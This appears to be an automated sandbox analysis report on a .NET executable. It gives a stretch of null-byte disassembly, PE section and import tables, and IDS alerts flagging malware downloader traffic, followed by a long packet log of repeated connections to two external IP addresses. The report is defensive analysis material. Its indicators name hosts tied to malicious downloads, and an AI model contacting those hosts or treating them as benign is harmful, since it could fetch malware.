add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
or byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
and byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9214f	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x94000	0x55c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x90c00	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x96000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x90b28	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x901e8	0x90200	b525bd3b0098719fc2af6e6b3a8f8603	False	0.8958186524284475	data	7.690647824328755	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x94000	0x55c	0x600	c9a41d0f2b852e3de60639b7e86d24c0	False	0.3997395833333333	data	3.9165285901142335	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x96000	0xc	0x200	7cfb45207b242ec50fb46df07493aee6	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x94090	0x2cc	data			0.4329608938547486
RT_MANIFEST	0x9436c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-02T20:19:49.536135+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49716	158.101.44.242	80	TCP
2025-01-02T20:19:50.692399+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49716	158.101.44.242	80	TCP
2025-01-02T20:19:51.368052+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49724	188.114.96.3	443	TCP
2025-01-02T20:19:52.129987+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49730	158.101.44.242	80	TCP
2025-01-02T20:19:53.861802+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49745	188.114.96.3	443	TCP
2025-01-02T20:19:54.489294+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49751	158.101.44.242	80	TCP
2025-01-02T20:19:55.193250+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49759	188.114.96.3	443	TCP
2025-01-02T20:19:55.426779+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49751	158.101.44.242	80	TCP
2025-01-02T20:19:55.986554+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49766	188.114.96.3	443	TCP
2025-01-02T20:19:56.428567+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49771	188.114.96.3	443	TCP
2025-01-02T20:19:56.645584+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49773	158.101.44.242	80	TCP
2025-01-02T20:19:57.621211+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49781	188.114.96.3	443	TCP
2025-01-02T20:20:01.950880+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49818	188.114.96.3	443	TCP
2025-01-02T20:20:08.842016+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49860	188.114.96.3	443	TCP
2025-01-02T20:20:15.806427+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49905	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 20:19:48.639220953 CET	49716	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:48.644109011 CET	80	49716	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:48.644195080 CET	49716	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:48.644891024 CET	49716	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:48.649743080 CET	80	49716	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:49.335344076 CET	80	49716	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:49.339862108 CET	49716	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:49.344695091 CET	80	49716	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:49.493112087 CET	80	49716	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:49.536134958 CET	49716	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:49.581724882 CET	49717	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:49.581752062 CET	443	49717	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:49.581899881 CET	49717	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:49.613651037 CET	49717	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:49.613670111 CET	443	49717	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:50.107430935 CET	443	49717	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:50.107625008 CET	49717	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:50.133730888 CET	49717	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:50.133754969 CET	443	49717	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:50.134166956 CET	443	49717	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:50.177126884 CET	49717	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:50.346246958 CET	49717	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:50.391338110 CET	443	49717	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:50.466963053 CET	443	49717	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:50.467022896 CET	443	49717	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:50.467180014 CET	49717	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:50.478523016 CET	49717	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:50.483355999 CET	49716	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:50.488224030 CET	80	49716	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:50.643948078 CET	80	49716	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:50.649228096 CET	49724	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:50.649279118 CET	443	49724	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:50.649358034 CET	49724	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:50.649806023 CET	49724	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:50.649817944 CET	443	49724	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:50.692399025 CET	49716	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:51.213267088 CET	443	49724	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:51.239626884 CET	49724	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:51.239667892 CET	443	49724	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:51.368237972 CET	443	49724	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:51.368387938 CET	443	49724	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:51.369133949 CET	49724	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:51.369394064 CET	49724	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:51.372442007 CET	49716	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:51.373591900 CET	49730	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:51.377443075 CET	80	49716	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:51.378443956 CET	80	49730	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:51.378529072 CET	49716	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:51.378566027 CET	49730	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:51.378695011 CET	49730	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:51.383483887 CET	80	49730	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:51.961796045 CET	80	49730	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:51.962965012 CET	49737	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:51.963005066 CET	443	49737	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:51.963088989 CET	49737	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:51.963337898 CET	49737	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:51.963361025 CET	443	49737	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:52.129987001 CET	49730	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:52.449136019 CET	443	49737	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:52.451016903 CET	49737	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:52.451036930 CET	443	49737	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:52.601959944 CET	443	49737	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:52.602010012 CET	443	49737	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:52.602077007 CET	49737	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:52.602684975 CET	49737	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:52.607640028 CET	49744	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:52.612420082 CET	80	49744	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:52.612513065 CET	49744	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:52.612618923 CET	49744	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:52.617364883 CET	80	49744	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:53.200840950 CET	80	49744	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:53.240540028 CET	49745	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:53.240576029 CET	443	49745	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:53.240653992 CET	49745	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:53.241094112 CET	49745	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:53.241110086 CET	443	49745	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:53.254890919 CET	49744	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:53.619820118 CET	49751	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:53.624699116 CET	80	49751	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:53.624789000 CET	49751	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:53.625006914 CET	49751	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:53.629762888 CET	80	49751	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:53.717031956 CET	443	49745	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:53.719578028 CET	49745	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:53.719594955 CET	443	49745	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:53.861831903 CET	443	49745	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:53.861896992 CET	443	49745	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:53.862077951 CET	49745	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:53.862445116 CET	49745	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:53.868472099 CET	49744	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:53.869726896 CET	49752	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:53.873701096 CET	80	49744	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:53.873773098 CET	49744	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:53.874528885 CET	80	49752	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:53.874598026 CET	49752	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:53.874722958 CET	49752	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:53.879508018 CET	80	49752	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:54.244529009 CET	80	49751	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:54.278374910 CET	49751	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:54.283160925 CET	80	49751	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:54.438652992 CET	80	49751	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:54.487632990 CET	49758	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:54.487662077 CET	443	49758	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:54.487853050 CET	49758	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:54.489294052 CET	49751	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:54.493483067 CET	49758	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:54.493503094 CET	443	49758	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:54.512809038 CET	80	49752	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:54.513962984 CET	49759	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:54.514030933 CET	443	49759	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:54.514240980 CET	49759	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:54.514590025 CET	49759	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:54.514605999 CET	443	49759	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:54.567476034 CET	49752	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:55.038186073 CET	443	49758	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:55.038269997 CET	49758	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:55.040153027 CET	49758	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:55.040159941 CET	443	49758	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:55.040461063 CET	443	49758	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:55.045649052 CET	443	49759	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:55.047328949 CET	49759	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:55.047374964 CET	443	49759	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:55.083046913 CET	49758	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:55.103204012 CET	49758	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:55.143328905 CET	443	49758	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:55.193263054 CET	443	49759	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:55.193336964 CET	443	49759	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:55.193646908 CET	49759	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:55.193948984 CET	49759	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:55.198405027 CET	49752	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:55.199610949 CET	49765	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:55.203439951 CET	80	49752	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:55.203955889 CET	49752	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:55.204400063 CET	80	49765	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:55.204462051 CET	49765	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:55.204545975 CET	49765	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:55.209332943 CET	80	49765	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:55.217451096 CET	443	49758	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:55.217525959 CET	443	49758	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:55.217566013 CET	49758	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:55.221137047 CET	49758	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:55.225760937 CET	49751	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:55.230572939 CET	80	49751	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:55.381191969 CET	80	49751	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:55.383034945 CET	49766	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:55.383066893 CET	443	49766	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:55.383146048 CET	49766	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:55.383531094 CET	49766	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:55.383542061 CET	443	49766	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:55.426779032 CET	49751	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:55.784729004 CET	80	49765	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:55.786211967 CET	49771	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:55.786237001 CET	443	49771	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:55.786293030 CET	49771	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:55.786552906 CET	49771	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:55.786566019 CET	443	49771	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:55.833049059 CET	49765	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:55.849730015 CET	443	49766	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:55.851833105 CET	49766	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:55.851866961 CET	443	49766	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:55.986550093 CET	443	49766	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:55.986623049 CET	443	49766	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:55.986757994 CET	49766	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:55.987276077 CET	49766	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:55.991360903 CET	49751	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:55.992433071 CET	49773	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:55.996452093 CET	80	49751	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:55.997147083 CET	49751	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:55.997227907 CET	80	49773	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:55.997647047 CET	49773	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:55.997761011 CET	49773	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:56.002511024 CET	80	49773	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:56.250375986 CET	443	49771	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:56.252288103 CET	49771	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:56.252314091 CET	443	49771	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:56.428565025 CET	443	49771	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:56.428628922 CET	443	49771	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:56.428668976 CET	49771	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:56.429080963 CET	49771	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:56.432607889 CET	49765	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:56.434154034 CET	49774	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:56.437527895 CET	80	49765	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:56.437602043 CET	49765	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:56.438899040 CET	80	49774	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:56.438966990 CET	49774	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:56.439162016 CET	49774	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:56.443929911 CET	80	49774	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:56.602184057 CET	80	49773	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:56.603921890 CET	49780	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:56.603965044 CET	443	49780	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:56.604049921 CET	49780	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:56.604321003 CET	49780	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:56.604335070 CET	443	49780	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:56.645584106 CET	49773	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:57.001216888 CET	80	49774	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:57.002512932 CET	49781	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:57.002556086 CET	443	49781	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:57.002624035 CET	49781	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:57.002991915 CET	49781	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:57.003009081 CET	443	49781	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:57.051812887 CET	49774	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:57.067586899 CET	443	49780	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:57.069226027 CET	49780	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:57.069261074 CET	443	49780	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:57.220158100 CET	443	49780	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:57.220215082 CET	443	49780	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:57.220521927 CET	49780	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:57.220844984 CET	49780	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:57.225776911 CET	49783	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:57.230585098 CET	80	49783	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:57.230747938 CET	49783	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:57.230875969 CET	49783	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:57.235567093 CET	80	49783	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:57.466938019 CET	443	49781	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:57.468687057 CET	49781	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:57.468720913 CET	443	49781	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:57.621226072 CET	443	49781	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:57.621303082 CET	443	49781	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:57.621383905 CET	49781	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:57.622112036 CET	49781	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:57.625327110 CET	49774	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:57.626322031 CET	49788	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:57.630847931 CET	80	49774	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:57.630907059 CET	49774	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:57.631092072 CET	80	49788	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:57.631165028 CET	49788	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:57.631274939 CET	49788	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:57.636116982 CET	80	49788	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:57.808128119 CET	80	49783	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:57.809415102 CET	49789	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:57.809448957 CET	443	49789	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:57.809607983 CET	49789	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:57.809936047 CET	49789	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:57.809951067 CET	443	49789	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:57.848736048 CET	49783	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:58.206990957 CET	80	49788	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:58.208553076 CET	49795	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:58.208590984 CET	443	49795	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:58.208813906 CET	49795	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:58.208945036 CET	49795	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:58.208955050 CET	443	49795	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:58.254954100 CET	49788	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:58.305471897 CET	443	49789	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:58.307497025 CET	49789	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:58.307519913 CET	443	49789	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:58.438280106 CET	443	49789	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:58.438354015 CET	443	49789	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:58.438441992 CET	49789	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:58.450781107 CET	49789	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:58.483653069 CET	49783	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:58.484443903 CET	49796	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:58.488652945 CET	80	49783	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:58.489305973 CET	80	49796	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:58.489402056 CET	49783	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:58.489414930 CET	49796	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:58.489653111 CET	49796	80	192.168.2.6	158.101.44.242
Jan 2, 2025 20:19:58.494441986 CET	80	49796	158.101.44.242	192.168.2.6
Jan 2, 2025 20:19:58.668605089 CET	443	49795	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:58.670192003 CET	49795	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:58.670212984 CET	443	49795	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:58.848931074 CET	443	49795	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:58.849010944 CET	443	49795	188.114.96.3	192.168.2.6
Jan 2, 2025 20:19:58.849102974 CET	49795	443	192.168.2.6	188.114.96.3
Jan 2, 2025 20:19:58.910671949 CET	49795	443	192.168.2.6	188.114.96.3
